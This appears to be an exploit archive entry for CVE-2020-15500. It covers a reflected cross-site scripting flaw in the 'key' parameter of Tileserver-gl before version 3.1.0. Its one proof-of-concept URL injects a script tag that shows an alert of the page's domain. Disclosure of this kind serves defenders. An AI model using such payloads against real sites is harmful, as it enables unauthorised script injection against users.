Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)
| EKU-ID: 53757 | CVE: CVE-2020-15500 | OSVDB-ID: |
| Author: Akash Chathoth | Published: 2021-04-15 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 53757 | CVE: CVE-2020-15500 | OSVDB-ID: |
| Author: Akash Chathoth | Published: 2021-04-15 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Exploit Title: Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS) # Date: 15/04/2021 # Exploit Author: Akash Chathoth # Vendor Homepage: http://tileserver.org/ # Software Link: https://github.com/maptiler/tileserver-gl # Version: versions <3.1.0 # Tested on: 2.6.0 # CVE: 2020-15500 Exploit : http://example.com/?key="><script>alert(document.domain)</script>